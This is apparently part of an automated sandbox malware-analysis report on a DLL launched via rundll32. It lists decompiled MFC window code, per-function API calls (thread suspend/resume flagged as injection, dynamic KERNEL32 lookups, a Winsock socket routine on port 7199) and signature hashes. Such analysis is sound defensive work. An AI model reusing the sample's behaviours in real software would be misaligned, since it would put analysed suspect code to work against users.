                                                                                                                                  0x00000000
                                                                                                                                  0x1002a84e
                                                                                                                                  0x1002a84e
                                                                                                                                  0x1002a851
                                                                                                                                  0x1002a853
                                                                                                                                  0x1002a853
                                                                                                                                  0x1002a856
                                                                                                                                  0x1002a857
                                                                                                                                  0x1002a85d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002a85d
                                                                                                                                  0x1002a831
                                                                                                                                  0x1002a831
                                                                                                                                  0x1002a831
                                                                                                                                  0x1002a861
                                                                                                                                  0x1002a865
                                                                                                                                  0x1002a865
                                                                                                                                  0x1002a82f
                                                                                                                                  0x1002a824
                                                                                                                                  0x1002a800
                                                                                                                                  0x1002a800
                                                                                                                                  0x1002a80a
                                                                                                                                  0x1002a80e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x1002a80e
                                                                                                                                  0x00000000
                                                                                                                                  0x1002a7fe
                                                                                                                                  0x1002a85f
                                                                                                                                  0x1002a85f
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 656273425-0
                                                                                                                                  • Opcode ID: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                                  • Instruction ID: ae1ce06b8cbd239f24ee816c06620fe7a5750cbf7a5142a39db81a57ec361da3
                                                                                                                                  • Opcode Fuzzy Hash: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                                  • Instruction Fuzzy Hash: ECF1BC35E00206ABDF11EF61E984AAE7BF5EF46790F924029E845AB161DF34ECC0DB51
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1001AA48 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                  			E1001AA48(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E1001DDC0(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E10018D05(_t121, E10018C9A(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E10014B42();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E10018D05(_t121, E10018C9A(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E1001E09D(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

























                                                                                                                                  0x1001aa48
                                                                                                                                  0x1001aa48
                                                                                                                                  0x1001aa4f
                                                                                                                                  0x1001aa52
                                                                                                                                  0x1001aa5a
                                                                                                                                  0x1001aa5d
                                                                                                                                  0x1001aa62
                                                                                                                                  0x1001aa70
                                                                                                                                  0x1001aa82
                                                                                                                                  0x1001aa72
                                                                                                                                  0x1001aa75
                                                                                                                                  0x1001aa75
                                                                                                                                  0x1001aa88
                                                                                                                                  0x1001aa8c
                                                                                                                                  0x1001aa98
                                                                                                                                  0x1001aaa0
                                                                                                                                  0x1001aaa2
                                                                                                                                  0x1001aaa2
                                                                                                                                  0x1001aaa0
                                                                                                                                  0x1001aa64
                                                                                                                                  0x1001aa64
                                                                                                                                  0x1001aa64
                                                                                                                                  0x1001aa64
                                                                                                                                  0x1001aaa4
                                                                                                                                  0x1001aab2
                                                                                                                                  0x1001aabb
                                                                                                                                  0x1001ab5b
                                                                                                                                  0x1001ab62
                                                                                                                                  0x1001ab69
                                                                                                                                  0x1001ab73
                                                                                                                                  0x1001aac1
                                                                                                                                  0x1001aac3
                                                                                                                                  0x1001aac8
                                                                                                                                  0x1001aad3
                                                                                                                                  0x1001aadc
                                                                                                                                  0x1001aadc
                                                                                                                                  0x1001aad3
                                                                                                                                  0x1001aae0
                                                                                                                                  0x1001aae7
                                                                                                                                  0x1001ab28
                                                                                                                                  0x1001ab37
                                                                                                                                  0x1001ab44
                                                                                                                                  0x1001aae9
                                                                                                                                  0x1001aae9
                                                                                                                                  0x1001aaf0
                                                                                                                                  0x1001aaf2
                                                                                                                                  0x1001aaf2
                                                                                                                                  0x1001ab02
                                                                                                                                  0x1001ab15
                                                                                                                                  0x1001ab1f
                                                                                                                                  0x1001ab1f
                                                                                                                                  0x1001aae7
                                                                                                                                  0x1001ab82
                                                                                                                                  0x1001ab87
                                                                                                                                  0x1001ab8c
                                                                                                                                  0x1001ab90
                                                                                                                                  0x1001ab93
                                                                                                                                  0x1001ab9a
                                                                                                                                  0x1001aba2
                                                                                                                                  0x1001abaa
                                                                                                                                  0x1001abb2
                                                                                                                                  0x1001abb9
                                                                                                                                  0x1001abbe
                                                                                                                                  0x1001abca
                                                                                                                                  0x1001abd2
                                                                                                                                  0x1001abd2
                                                                                                                                  0x1001abc0
                                                                                                                                  0x1001abc0
                                                                                                                                  0x1001abc0
                                                                                                                                  0x1001abd8
                                                                                                                                  0x1001abe7
                                                                                                                                  0x1001abef
                                                                                                                                  0x1001abef
                                                                                                                                  0x1001abda
                                                                                                                                  0x1001abda
                                                                                                                                  0x1001abda
                                                                                                                                  0x1001ac07

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                                  • GetParent.USER32(?), ref: 1001AA75
                                                                                                                                  • SendMessageA.USER32 ref: 1001AA98
                                                                                                                                  • GetWindowRect.USER32 ref: 1001AAB2
                                                                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 1001AAC8
                                                                                                                                  • CopyRect.USER32(?,?), ref: 1001AB15
                                                                                                                                  • CopyRect.USER32(?,?), ref: 1001AB1F
                                                                                                                                  • GetWindowRect.USER32 ref: 1001AB28
                                                                                                                                  • CopyRect.USER32(?,?), ref: 1001AB44
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                                  • String ID: (
                                                                                                                                  • API String ID: 808654186-3887548279
                                                                                                                                  • Opcode ID: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                                  • Instruction ID: b5709b81a08ee2b414ac32db9db5e9a4175f57b01f1fa3e32d23aafb2ee176ce
                                                                                                                                  • Opcode Fuzzy Hash: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                                  • Instruction Fuzzy Hash: CC513C72900219AFDB00CBA8CD85EEEBBF9EF49214F154115F905EB291EB34E985CB61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 100161C0 Relevance: 18.1, APIs: 12, Instructions: 91synchronizationthreadinjectionCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 100161DE
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 100161FC
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 10016206
                                                                                                                                  • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 10016248
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016253
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 1001625C
                                                                                                                                  • SuspendThread.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 10016267
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016277
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 10016280
                                                                                                                                  • CloseHandle.KERNEL32(00000002), ref: 100162A2
                                                                                                                                    • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                  • SetEvent.KERNEL32(00000004,?,?,?,?,?,?,?,00000000), ref: 1001628A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseEventHandle$CreateObjectSingleThreadWait$Exception@8ResumeSuspendThrow_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3191170017-0
                                                                                                                                  • Opcode ID: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                                  • Instruction ID: 00337a1eacd8e53df2662d8cc6bc483a2e3f323796300d703392e3233c80558b
                                                                                                                                  • Opcode Fuzzy Hash: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                                  • Instruction Fuzzy Hash: 69314772800A19FFDF11AFA4CD849AEBBB8EB08394F108269F511A6160D671A9818F61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10014538 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1001501F,000000FF), ref: 1001455A
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateActCtxA,10000000), ref: 10014578
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10014585
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10014592
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1001459F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                  • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                                  • API String ID: 667068680-3617302793
                                                                                                                                  • Opcode ID: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                                  • Instruction ID: 377a8d7a9955057825aa4721d5912d38cb8da7d44d97b701af19917326088f09
                                                                                                                                  • Opcode Fuzzy Hash: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                                  • Instruction Fuzzy Hash: E711A0B1902766FFE710DF658CD040B7BE5E780256313023FF108CA422DA729884CB22
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1001736E Relevance: 16.6, APIs: 11, Instructions: 139COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_catch.LIBCMT ref: 10017375
                                                                                                                                  • FindResourceA.KERNEL32 ref: 100173A8
                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 100173B0
                                                                                                                                  • LockResource.KERNEL32(00000008,00000024,100010EC,00000000,10046640), ref: 100173C1
                                                                                                                                  • GetDesktopWindow.USER32 ref: 100173F4
                                                                                                                                  • IsWindowEnabled.USER32(000000FF), ref: 10017402
                                                                                                                                  • EnableWindow.USER32(000000FF,00000000), ref: 10017411
                                                                                                                                    • Part of subcall function 1001DEAF: IsWindowEnabled.USER32(?), ref: 1001DEB8
                                                                                                                                    • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                                  • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                                  • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                                  • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                                  • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1509511306-0
                                                                                                                                  • Opcode ID: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                                  • Instruction ID: 24f9302adfe4a133b48f7954ad32019338b8f4d830f04ff5f1dc3598c8fc37ea
                                                                                                                                  • Opcode Fuzzy Hash: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                                  • Instruction Fuzzy Hash: 41519A34A00715DBDB11EFB4CD896AEBBF2FF48701F204129E506AA1A1DB74E9C1CB55
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1001C7D1 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_catch.LIBCMT ref: 1001C7D8
                                                                                                                                  • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001C7E7
                                                                                                                                  • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 1001C841
                                                                                                                                    • Part of subcall function 1001B617: GetWindowRect.USER32 ref: 1001B63F
                                                                                                                                    • Part of subcall function 1001B617: GetWindow.USER32(?,00000004), ref: 1001B65C
                                                                                                                                  • SetWindowLongA.USER32 ref: 1001C868
                                                                                                                                  • RemovePropA.USER32(?,AfxOldWndProc423), ref: 1001C870
                                                                                                                                  • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1001C877
                                                                                                                                  • GlobalDeleteAtom.KERNEL32(00000000), ref: 1001C87E
                                                                                                                                    • Part of subcall function 10019DB1: GetWindowRect.USER32 ref: 10019DBD
                                                                                                                                  • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 1001C8D2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                                  • String ID: AfxOldWndProc423
                                                                                                                                  • API String ID: 2702501687-1060338832
                                                                                                                                  • Opcode ID: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                                  • Instruction ID: 2c86e32aa846b6cd4ed02fbbba056fe4065443c08480c9ca6c7694d446bc6c4a
                                                                                                                                  • Opcode Fuzzy Hash: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                                  • Instruction Fuzzy Hash: D931417680011AEBDF06DFA4CD89DFF7AB8EF0A311F004124F611AA061DB79D9919B65
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10012E90 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 81networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                                    • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                                  • inet_addr.WS2_32(?), ref: 10012ECA
                                                                                                                                  • htons.WS2_32(00001C1F), ref: 10012EF0
                                                                                                                                    • Part of subcall function 1001C0D4: GetWindowTextLengthA.USER32 ref: 1001C0E0
                                                                                                                                    • Part of subcall function 1001C0D4: GetWindowTextA.USER32(?,00000000,00000000), ref: 1001C0F8
                                                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 10012F58
                                                                                                                                  • _printf.LIBCMT ref: 10012F79
                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 10012F87
                                                                                                                                  • WSACleanup.WS2_32 ref: 10012FB6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: TextWindow$CleanupH_prolog3LengthStartup_printfhtonsinet_addrsocket
                                                                                                                                  • String ID: Please enter your name$WSAStartup function failed with error: %d$error
                                                                                                                                  • API String ID: 4222005279-2156106531
                                                                                                                                  • Opcode ID: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
                                                                                                                                  • Instruction ID: 3737c0697f466a88bc0bbe9275da51ac62ffde411ffa2b98b4ee14bbe11db7c9
                                                                                                                                  • Opcode Fuzzy Hash: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
                                                                                                                                  • Instruction Fuzzy Hash: 6A317174A85218DBE724DB90CD66FD9B3B1EF48300F1041E8E609AA2C2DB72E9C18F55
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 100351B5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46libraryloaderCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32.DLL,10050C40,0000000C,100352C7,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2), ref: 100351C6
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EncodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351EF
                                                                                                                                  • GetProcAddress.KERNEL32(?,DecodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351FF
                                                                                                                                  • InterlockedIncrement.KERNEL32(10054D18), ref: 10035221
                                                                                                                                  • __lock.LIBCMT ref: 10035229
                                                                                                                                  • ___addlocaleref.LIBCMT ref: 10035248
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                                  • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                  • API String ID: 1036688887-2843748187
                                                                                                                                  • Opcode ID: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                                  • Instruction ID: b318c4b35d3b307acbdb6d10fcd30e50ea36946f4a8ba2e6b5da3482df9394b6
                                                                                                                                  • Opcode Fuzzy Hash: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                                  • Instruction Fuzzy Hash: B811ACB0801B01AFE721CF79CC80B9ABBE0EF05302F104529E49ADB261DB75A900CF15
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1001717E Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_catch.LIBCMT ref: 10017185
                                                                                                                                  • GetSystemMetrics.USER32 ref: 10017236
                                                                                                                                  • GlobalLock.KERNEL32 ref: 1001729F
                                                                                                                                  • CreateDialogIndirectParamA.USER32(?,?,?,10016BDA,00000000), ref: 100172CE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
